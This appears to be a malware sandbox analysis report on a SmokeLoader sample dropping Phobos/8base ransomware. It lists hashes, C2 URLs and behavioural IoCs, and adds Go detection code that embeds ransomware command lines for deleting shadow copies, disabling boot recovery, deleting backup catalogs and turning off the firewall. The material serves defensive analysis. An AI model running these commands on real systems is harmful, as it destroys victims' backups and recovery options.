Analysis
max time kernel: 150s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20230621-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230621-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-06-2023 10:24

Static task: static1
Behavioral task behavioral1: sample e142f4e8eb3fb4323fb377138.exe, resource win7-20230621-en
Behavioral task behavioral2: sample e142f4e8eb3fb4323fb377138.exe, resource win10v2004-20230621-en

General
Target: e142f4e8eb3fb4323fb377138.exe
Size: 281KB
MD5: 9769c181ecef69544bbb2f974b8c0e10
SHA1: 5d0f447f4ccc89d7d79c0565372195240cdfa25f
SHA256: e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0
SHA512: b3da8fea6ee5d6b67f55a4043f18d7325f1700c9f3dcb0e7cbf21f49ebdbb56b5a10a2d03153d0dfb1e8dc34db20cdea0236c448f2c361fadbabf9a6f59b4c7a
SSDEEP: 3072:Z5SXIMALRKEttgCWAbi1D1fJmxIV0BN3omE9MA5yXsztcJe9:GIMpEtCCWAbiBRmE9o6
Malware Config
Extracted: smokeloader (version 2022)
C2 URLs:
http://serverlogs37.xyz/statweb255/
http://servblog757.xyz/statweb255/
http://dexblog45.xyz/statweb255/
http://admlogs.online/statweb255/
http://blogstat355.xyz/statweb255/
http://blogstatserv25.xyz/statweb255/
Signatures

Phobos
Phobos ransomware appeared at the beginning of 2019.

SmokeLoader
Modular backdoor trojan in use since 2014.

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes (description, ioc, process):
  Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  E4D8.exe

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes (pid, process):
  268  bcdedit.exe
  996  bcdedit.exe
Renames multiple (407) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

Blocklisted process makes network request 1 IoCs
Processes (flow, pid, process):
  32  1284  powershell.exe

(signature title missing from page) 1 IoCs
Processes (pid, process):
  2940  wbadmin.exe

Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 2 IoCs

Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  E4D8.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  E4D8.exe
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes (description, ioc, process):
  Key value queried  \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation  E4D8.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation  SRD.bat.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation  sv.bat.exe

Drops startup file 1 IoCs
Processes (description, ioc, process):
  File created  \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\EA96.exe  EA96.exe

Executes dropped EXE 13 IoCs
Processes (pid, process):
  4200  D5D3.exe
  1168  E4D8.exe
  1816  E834.exe
  4480  EA96.exe
  2424  ED76.exe
  4812  EA96.exe
  2956  E4D8.exe
  4652  E4D8.exe
  3748  E4D8.exe
  2116  E4D8.exe
  4312  SRD.bat.exe
  5996  sv.bat.exe
  280   PublicKey.exe

Loads dropped DLL 1 IoCs
Processes (pid, process):
  1168  E4D8.exe
Obfuscated with Agile.Net obfuscator 7 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes (resource, yara_rule):
  C:\Users\Admin\AppData\Local\Temp\E4D8.exe  agile_net  (6 matches)
  behavioral2/memory/1168-247-0x0000000000DB0000-0x000000000140E000-memory.dmp  agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

(signature title missing from page; yara rule themida) 4 IoCs
Processes (resource, yara_rule):
  C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll  themida  (2 matches)
  behavioral2/memory/1168-286-0x0000000071E80000-0x0000000072460000-memory.dmp  themida
  behavioral2/memory/1168-1308-0x0000000071E80000-0x0000000072460000-memory.dmp  themida

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes (description, ioc, process):
  Key opened  \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  explorer.exe
  Key opened  \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  explorer.exe
  Key opened  \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  explorer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 4 IoCs
Processes (description, ioc, process):
  Set value (str)  \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe"  PublicKey.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EA96 = "C:\\Users\\Admin\\AppData\\Local\\EA96.exe"  EA96.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EA96 = "C:\\Users\\Admin\\AppData\\Local\\EA96.exe"  EA96.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe"  D5D3.exe

Checks whether UAC is enabled 1 IoCs
Processes (description, ioc, process):
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  E4D8.exe

Drops desktop.ini file(s) 5 IoCs
Processes (description, ioc, process):
  File opened for modification  C:\Program Files (x86)\desktop.ini  EA96.exe
  File opened for modification  C:\$Recycle.Bin\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini  EA96.exe
  File opened for modification  F:\$RECYCLE.BIN\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini  EA96.exe
  File opened for modification  C:\Program Files\desktop.ini  EA96.exe
  File opened for modification  C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI  EA96.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
Processes (pid, process):
  1284  powershell.exe  (21 entries)

Suspicious use of SetThreadContext 3 IoCs
Processes (description, pid, process, target process):
  PID 1960 set thread context of 3656  1960  e142f4e8eb3fb4323fb377138.exe  e142f4e8eb3fb4323fb377138.exe
  PID 1168 set thread context of 2116  1168  E4D8.exe  E4D8.exe
  PID 1284 set thread context of 5896  1284  powershell.exe  aspnet_compiler.exe
Drops file in Program Files directory 64 IoCs
Processes (description, ioc): all 64 operations below are by EA96.exe. The contact address inside the appended ".id[2A5E155A-3483].[...].8base" extension was replaced by "[email protected]" when this page was captured and cannot be recovered from this copy.
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml
  File created  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageLargeTile.scale-125.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-24_altform-unplated_contrast-white.png
  File created  C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo.id[2A5E155A-3483].[[email protected]].8base
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ui-strings.js
  File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\Entities
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ClickToRun\vccorlib140.dll
  File opened for modification  C:\Program Files\InstallRedo.jtx
  File created  C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_duplicate_plugin.dll.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-72_contrast-white.png
  File created  C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-white_targetsize-96.png
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-oob.xrm-ms
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSplashLogo.scale-250.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-white\WideTile.scale-100.png
  File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Entities
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ClickToRun\FrequentOfficeUpdateSchedule.xml
  File created  C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-80_altform-unplated_contrast-black.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\SmallTile.scale-200.png
  File created  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif.id[2A5E155A-3483].[[email protected]].8base
  File created  C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcDemoR_BypassTrial365-ppd.xrm-ms.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\GrooveIntlResource.dll.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-16_altform-unplated.png
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_shared.gif.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoDev.png
  File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ppd.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_K_COL.HXK
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses_selected.svg
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\ui-strings.js
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial2-ppd.xrm-ms
  File created  C:\Program Files\VideoLAN\VLC\skins\winamp2.xml.id[2A5E155A-3483].[[email protected]].8base
  File created  C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.bg-bg.dll.id[2A5E155A-3483].[[email protected]].8base
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\ui-strings.js.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main.css
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files\Microsoft Office\root\Office16\1033\WORD_WHATSNEW.XML
  File opened for modification  C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-36_altform-lightunplated.png
  File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-100.png
  File created  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\as80.xsl.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files\VideoLAN\VLC\plugins\codec\libmft_plugin.dll
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\PointerIndicatorPixelShader.cso
  File created  C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-private-l1-1-0.dll.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL022.XML
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\MedTile.scale-125.png
  File opened for modification  C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example2.Diagnostics\1.0.1\Example2.Diagnostics.psd1
  File created  C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Exchange.WebServices.dll.id[2A5E155A-3483].[[email protected]].8base
  File created  C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\trdtv2r41.xsl.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-48_contrast-black.png
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up-pressed.gif
  File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Google.scale-250.png
  File created  C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-pl.xrm-ms.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_sv.dll
  File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\eml.scale-48.png
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\ui-strings.js.id[2A5E155A-3483].[[email protected]].8base
  File created  C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.id[2A5E155A-3483].[[email protected]].8base
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\EnsoUI\id_arrow_black.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\Icons\icon_play_prs.png
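The "Renames multiple (407) files with added filename extension" heuristic, worked as code over file events of the shape listed above. This is an added example, not the sandbox's own rule. It clusters "File created" events by acting process and trailing extension, counts only names that still carry an extension underneath the appended one (vlc.mo.id[...].8base qualifies, setup.log does not), and once a cluster passes a threshold it pulls the Phobos-style victim id and contact string out of the name. Go is used so the block runs with the standard library alone. Assumptions: the sample events are constructed from eight of the .8base paths above plus invented installer noise; the contact address inside the real extension is replaced on this page by an "[email protected]" placeholder, so a made-up contact@example.invalid stands in for it.

```go
package main

import (
	"regexp"
	"sort"
	"strings"
)

// FileEvent is one row of the sandbox's file table: operation, path, acting process.
type FileEvent struct {
	Op, Path, Process string
}

// phobosExt matches what the Phobos family appends to each encrypted file:
// <original name>.id[<victim id>].[<contact>].<ext>   (here 2A5E155A-3483 and 8base)
var phobosExt = regexp.MustCompile(`^(.+)\.id\[([0-9A-Fa-f]{8}-[0-9A-Fa-f]{4})\]\.\[([^\]]+)\]\.([A-Za-z0-9]+)$`)

// Verdict summarises one (process, appended extension) cluster.
type Verdict struct {
	Process, Extension string
	Files, Dirs        int    // distinct files created / directories touched
	VictimID, Contact  string // filled in when the names match phobosExt
}

func splitWinPath(p string) (dir, base string) {
	i := strings.LastIndexAny(p, `\/`)
	return p[:i+1], p[i+1:]
}

// appendedExt returns the trailing extension and whether the name underneath still
// has one of its own: "vlc.mo.8base" -> ("8base", true); "setup.log" -> ("log", false).
func appendedExt(base string) (string, bool) {
	i := strings.LastIndex(base, ".")
	if i <= 0 {
		return "", false
	}
	return base[i+1:], strings.Contains(base[:i], ".")
}

// Analyze is the "renames multiple files with added filename extension" heuristic:
// cluster "File created" events by (process, appended extension) and report clusters
// of at least minFiles files. In-place writes and single-extension names are ignored.
func Analyze(events []FileEvent, minFiles int) []Verdict {
	type key struct{ proc, ext string }
	files := map[key]map[string]bool{}
	dirs := map[key]map[string]bool{}
	ids := map[key][2]string{}
	for _, e := range events {
		if e.Op != "File created" {
			continue
		}
		dir, base := splitWinPath(e.Path)
		ext, appended := appendedExt(base)
		if !appended {
			continue
		}
		k := key{strings.ToLower(e.Process), strings.ToLower(ext)}
		if files[k] == nil {
			files[k], dirs[k] = map[string]bool{}, map[string]bool{}
		}
		files[k][strings.ToLower(e.Path)] = true
		dirs[k][strings.ToLower(dir)] = true
		if m := phobosExt.FindStringSubmatch(base); m != nil {
			ids[k] = [2]string{m[2], m[3]}
		}
	}
	var out []Verdict
	for k, f := range files {
		if len(f) >= minFiles {
			out = append(out, Verdict{k.proc, k.ext, len(f), len(dirs[k]), ids[k][0], ids[k][1]})
		}
	}
	sort.Slice(out, func(i, j int) bool { return out[i].Files > out[j].Files })
	return out
}

// Constructed sample: eight of the .8base creations listed above, two of the in-place
// writes, and invented benign installer activity. The contact string is made up; the
// page shows only an "[email protected]" placeholder where the real one was.
const contact = "contact@example.invalid"

var tag = ".id[2A5E155A-3483].[" + contact + "].8base"

var sampleFileEvents = []FileEvent{
	{"File created", `C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml` + tag, "EA96.exe"},
	{"File created", `C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo` + tag, "EA96.exe"},
	{"File created", `C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api` + tag, "EA96.exe"},
	{"File created", `C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_duplicate_plugin.dll` + tag, "EA96.exe"},
	{"File created", `C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto` + tag, "EA96.exe"},
	{"File created", `C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo` + tag, "EA96.exe"},
	{"File created", `C:\Program Files\VideoLAN\VLC\skins\winamp2.xml` + tag, "EA96.exe"},
	{"File created", `C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.bg-bg.dll` + tag, "EA96.exe"},
	{"File opened for modification", `C:\Program Files\Common Files\microsoft shared\ClickToRun\vccorlib140.dll`, "EA96.exe"},
	{"File opened for modification", `C:\Program Files\InstallRedo.jtx`, "EA96.exe"},
	{"File created", `C:\Program Files\ExampleApp\setup.log`, "installer.exe"},
	{"File created", `C:\Program Files\ExampleApp\app.exe`, "installer.exe"},
	{"File created", `C:\Program Files\ExampleApp\data.tar.gz`, "installer.exe"},
}
```

Analyze(sampleFileEvents, 5) returns a single Verdict for ea96.exe: extension 8base, 8 files across 8 directories, victim id 2A5E155A-3483. The threshold matters: a legitimate installer writing one data.tar.gz also has a "double" extension, so a single hit must never page anyone; the report's count of 407 renamed files is what makes the signal unambiguous.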
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Program crash 1 IoCs
Processes (pid, pid_target, process, target process):
  3148  4812  WerFault.exe  EA96.exe

Checks SCSI registry key(s) 3 TTPs 7 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName  vds.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000  vds.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName  vds.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  e142f4e8eb3fb4323fb377138.exe
  Key queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  e142f4e8eb3fb4323fb377138.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  e142f4e8eb3fb4323fb377138.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000  vds.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes (pid, process):
  4680  vssadmin.exe
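Detection logic for the recovery-inhibition chain the signatures record (vssadmin, WMIC, two bcdedit runs, wbadmin and netsh, with vssadmin and netsh launched through cmd.exe under EA96.exe according to the WriteProcessMemory table), written as an added example in Go; it is not part of the sandbox report. Each of these tools on its own is ordinary administration, so the rule charges every hit to the first ancestor that is not a shell host and alerts only when two or more distinct techniques originate from the same process. Assumptions: the events are constructed. They reuse the PIDs and the EA96.exe -> cmd.exe -> tool parentage shown in this report, but the report prints no command lines and does not name the parents of bcdedit, WMIC or wbadmin, so the command lines are the usual ones for these techniques and those three are assumed to have been started by the same cmd.exe (1204).

```go
package main

import (
	"regexp"
	"sort"
	"strings"
)

// ProcEvent is a minimal process-creation record (Sysmon event 1 / Security 4688 fields).
type ProcEvent struct {
	PID, PPID      int
	Image, CmdLine string
}

// One rule per technique. The binaries are the ones this report shows being run; the
// argument patterns are the usual ones and are an assumption, the report prints no command lines.
var rules = []struct {
	Name, Image string // Image is the lower-case binary name
	Args        *regexp.Regexp
}{
	{"vss-delete", "vssadmin.exe", regexp.MustCompile(`(?i)delete\s+shadows`)},
	{"wmic-shadowcopy", "wmic.exe", regexp.MustCompile(`(?i)shadowcopy\s+delete`)},
	{"bcdedit-recovery", "bcdedit.exe", regexp.MustCompile(`(?i)recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures`)},
	{"wbadmin-catalog", "wbadmin.exe", regexp.MustCompile(`(?i)delete\s+(catalog|systemstatebackup|backup)`)},
	{"firewall-off", "netsh.exe", regexp.MustCompile(`(?i)advfirewall\s+set\s+\w+\s+state\s+off|firewall\s+set\s+opmode\s+(mode=)?disable`)},
}

// Alert charges a cluster of distinct techniques to one origin process.
type Alert struct {
	OriginPID   int
	OriginImage string
	Rules       []string // sorted, distinct
}

func baseName(p string) string {
	return strings.ToLower(p[strings.LastIndexAny(p, `\/`)+1:])
}

// origin walks up from a tool past cmd.exe/conhost.exe hosts, so tools a dropper runs via
// "cmd /c" are charged to the dropper (EA96.exe in the report), not to a throwaway shell.
func origin(tool ProcEvent, byPID map[int]ProcEvent) ProcEvent {
	cur := tool
	for i := 0; i < 16; i++ { // bounded: PID reuse can make the parent chain loop
		parent, ok := byPID[cur.PPID]
		if !ok {
			break // parent outside our window: charge the nearest known ancestor
		}
		cur = parent
		if b := baseName(cur.Image); b != "cmd.exe" && b != "conhost.exe" {
			break
		}
	}
	return cur
}

// Evaluate alerts on every origin process that shows at least two distinct techniques.
func Evaluate(events []ProcEvent) []Alert {
	byPID := map[int]ProcEvent{}
	for _, e := range events {
		byPID[e.PID] = e
	}
	hits := map[int]map[string]bool{} // origin pid -> rule names seen
	for _, e := range events {
		for _, r := range rules {
			if r.Image != baseName(e.Image) || !r.Args.MatchString(e.CmdLine) {
				continue
			}
			o := origin(e, byPID).PID
			if hits[o] == nil {
				hits[o] = map[string]bool{}
			}
			hits[o][r.Name] = true
		}
	}
	var out []Alert
	for pid, names := range hits {
		if len(names) < 2 { // a lone vssadmin or bcdedit call is routine administration
			continue
		}
		a := Alert{OriginPID: pid, OriginImage: byPID[pid].Image}
		for n := range names {
			a.Rules = append(a.Rules, n)
		}
		sort.Strings(a.Rules)
		out = append(out, a)
	}
	sort.Slice(out, func(i, j int) bool { return out[i].OriginPID < out[j].OriginPID })
	return out
}

// Constructed events: PIDs and the EA96.exe -> cmd.exe -> tool parentage follow the report;
// the bcdedit/WMIC/wbadmin parents and every command line are assumed.
var sampleEvents = []ProcEvent{
	{4480, 2636, `C:\Users\Admin\AppData\Local\EA96.exe`, `C:\Users\Admin\AppData\Local\EA96.exe`},
	{1204, 4480, `C:\Windows\System32\cmd.exe`, `cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete`},
	{4680, 1204, `C:\Windows\System32\vssadmin.exe`, `vssadmin delete shadows /all /quiet`},
	{2924, 1204, `C:\Windows\System32\wbem\WMIC.exe`, `wmic shadowcopy delete`},
	{268, 1204, `C:\Windows\System32\bcdedit.exe`, `bcdedit /set {default} bootstatuspolicy ignoreallfailures`},
	{996, 1204, `C:\Windows\System32\bcdedit.exe`, `bcdedit /set {default} recoveryenabled no`},
	{2940, 1204, `C:\Windows\System32\wbadmin.exe`, `wbadmin delete catalog -quiet`},
	{4548, 4480, `C:\Windows\System32\cmd.exe`, `cmd.exe /c netsh advfirewall set currentprofile state off`},
	{4376, 4548, `C:\Windows\System32\netsh.exe`, `netsh advfirewall set currentprofile state off`},
	{7001, 7000, `C:\Windows\System32\vssadmin.exe`, `vssadmin list shadows`}, // benign: interactive listing
}
```

Evaluate(sampleEvents) yields one Alert charged to PID 4480 (EA96.exe) carrying five techniques; the benign "vssadmin list shadows" matches nothing and the two bcdedit runs collapse into a single technique. Matching on the tool's own image rather than on the cmd.exe command line avoids counting the same action twice when the shell line and the child both appear in telemetry.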
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid, process):
  3656  e142f4e8eb3fb4323fb377138.exe  (2 entries)
  2636  (process name not recorded)  (62 entries)

Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes (pid, process):
  2636  (process name not recorded)

Suspicious behavior: MapViewOfSection 31 IoCs
Processes (pid, process):
  3656  e142f4e8eb3fb4323fb377138.exe  (1 entry)
  2636  (process name not recorded)  (30 entries)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (pid, process: privileges enabled, in the order logged; repeats noted):
  2636 (process name not recorded): SeShutdownPrivilege, SeCreatePagefilePrivilege, as a pair, five times over the run
  1284 powershell.exe: SeDebugPrivilege; later SeShutdownPrivilege, SeCreatePagefilePrivilege
  4480 EA96.exe: SeDebugPrivilege
  4816 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  4200 D5D3.exe: SeDebugPrivilege
